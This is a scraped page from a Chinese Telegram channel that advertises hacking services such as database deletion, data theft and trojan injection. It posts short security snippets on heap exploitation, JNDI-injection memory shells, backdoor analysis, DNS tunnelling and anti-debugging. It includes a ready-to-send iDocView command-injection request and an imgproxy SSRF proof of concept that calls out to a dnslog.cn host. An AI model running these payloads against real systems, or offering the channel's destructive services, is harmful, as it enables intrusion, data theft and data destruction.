红客解密程序 暗网编程
27.6K subscribers
966 photos
12 videos
1 file
56 links
渗透测试,#删库,数据删除 拿数据库 木马注入 破解,提权,Dns动持
Download Telegram
中国客户信息外泄,这家公司主动通知客户

针对“中国客户信息遭泄露”,迪奥官方客服5月13日回应表示,确有未经授权的外部方获取含客户信息的部分数据,但涉事数据库中未存储任何金融信息。

据媒体报道,5月12日,迪奥品牌向用户发布短信,表示该品牌发生数据泄露事件。

迪奥表示,已采取措施以避免此次恶意访问事件的事态扩大,在网络安全专家的协助下,公司正持续对该事件展开调查并进行应对,以及向相关监管部门进行报备。

根据目前调查进展,在中国收集的受影响的客户个人信息的最大范围可能包括姓名、性别、手机号码、电子邮箱地址、邮寄地址、消费水平、偏好,以及客户可能已向迪奥提供的其他信息。被访问的数据库中不包含诸如银行账户详情、国际银行账户号码(IBAN)或信用卡信息等财务信息。

短信中称,初步调查显示,此次事件是由数据库遭受未经授权的访问所致。迪奥建议客户对任何可疑通信(短信、电话、电子邮件)都要保持警惕。不要打开或点击来自不明来源的通信或链接,也不要透露验证码、密码等敏感信息。若收到任何以迪奥名义发送的可疑信息或联系,请客户咨询迪奥官方客服中心。

公开资料显示,迪奥是法国时尚消费品牌,隶属于全球奢侈品集团路威酩轩(简称“LVMH”),主要经营男女手袋、女装、男装、男女鞋履、首饰、香水、化妆品、童装等高档消费品。
从上面我们发现,触发if ( __builtin_expect ( FD -> bk != P || BK -> fd != P , 0 ))时会malloc_printerr ( "corrupted double-linked list" )报错。它其实就是检查当前堆块的前一个堆块的bk是不是指向当前堆块,当前堆块的后一个堆块的fd是不是指向当前堆块,如果不满足这个条件就会报错。实际上其他的libc版本还有一个检查,那个检查是查看当前要释放的堆块的size与它的下一个堆块的pre_size是否相同,如果不相同也会报错,做题时根据libc版本不同伪造fake chunk时要注意size。
DNS全称Domain Name System,在网络实现过程中担当着重要的角色。DNS保存有该网络中所有主机的域名和对应IP地址,并将域名转换为IP地址。一旦遭到非法篡改,用户将很可能被导向钓鱼网站或其他恶意网址。
关键点来了,如果这里面的foodsList用固定的数据,app页面的foodsList就能显示出来,也能打印出来foodsList,如果用了useSelector就foodsList就是空的
利用JNDI注入漏洞实现内存马注入
启动漏洞环境,代码如下

@GetMapping({"/jndi"})
public void jndi(@RequestParam String b) throws Exception {
byte[] decodedBytes = Base64.getDecoder().decode(b);
String decodedUrl = new String(decodedBytes , StandardCharsets.UTF_8);
InitialContext ctx = new InitialContext();
ctx.lookup(decodedUrl);
}
访问URL完成攻击 (传过去的jndi-url是rmi://localhost:11451/remoteObj)
通过分析,发现在OCEANMAP后门中,内置了邮箱账户信息,相关代码截图如上
老东西,在ASProtect中大量使用,主要是想隐藏OEP。当然仅靠这个无法对付冲击波和icedump的/tracex,但这两个都是运行在Win9x下的。

如果用SoftICE跟下面的程序,在执行到REPZ MOVSD指令(在inline函数memcpy的函数体中)时,就会失去线索(petite似乎也是这样)。除了__try{ }__except,还可以用__try{ } __finally,把这两个结合起来形成多重嵌套可以增加复杂度。
fireeye.ps1是一个巧妙利用DNS请求来接收命令和传输数据的脚本。总体行为如下:

获取用于标识身份的ID

通过获取DNS解析的IP地址 ,每次接收4个字节,写入批处理文件中

执行批处理文件,输出结果到TXT文件

发送TXT到服务器

清理痕迹
Java在反序列化时使用ObjectInputStream类,这个类实现了DataInput接口,这个接口定义了读取字符串的方法readUTF。在解码中,Java实际实现的是一个魔改过的UTF-8编码,名为“Modified UTF-8”
其原理就是GlassFish在路径解码时使用UTF-8编码,很典型的Overlong Encoding利用
I Doc View在线文档预览系统 命令执行漏洞

POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close

cmd=echo+%26+%28whoami%29+%26
method方法特殊语法

caller
当前节点的调用位置方法,比如cpg.method("start").caller就会返回codeInject方法

callIn
当前方法/函数节点的调用位置,比如cpg.method("start").callIn就会返回调用start方法的call节点

cpg.method(“start”)
名为start的方法的定义节点
朴实无华,但是在实际写的时候发现了问题。直接调用GetObjectData,则会调用该函数来序列化,binaryformatter也是一样
Imgproxy服务器端请求伪造漏洞
imgproxy <=3.14.0 poc

url /111/rs:fit:400:400:0:0/plain/http://xxxx.dnslog.cn
硬件推荐配置
sudo yum install -y curl policycoreutils-python openssh-server perl
# 如果没有成功,可以重启一下虚拟机再去安装
sudo systemctl enable sshd
sudo systemctl start sshd

curl -fsSL https://packages.gitlab.cn/repository/raw/scripts/setup.sh | /bin/bash


sudo EXTERNAL_URL="http://192.168.48.131" yum install -y gitlab-jh
# 192.168.48.131这个地址是安装者本人的虚拟机地址
1
DevOps 宏观大屏直观展示关键指标,实时监控项目进度、代码质量等数据,为决策提供依据,驱动企业数据化转型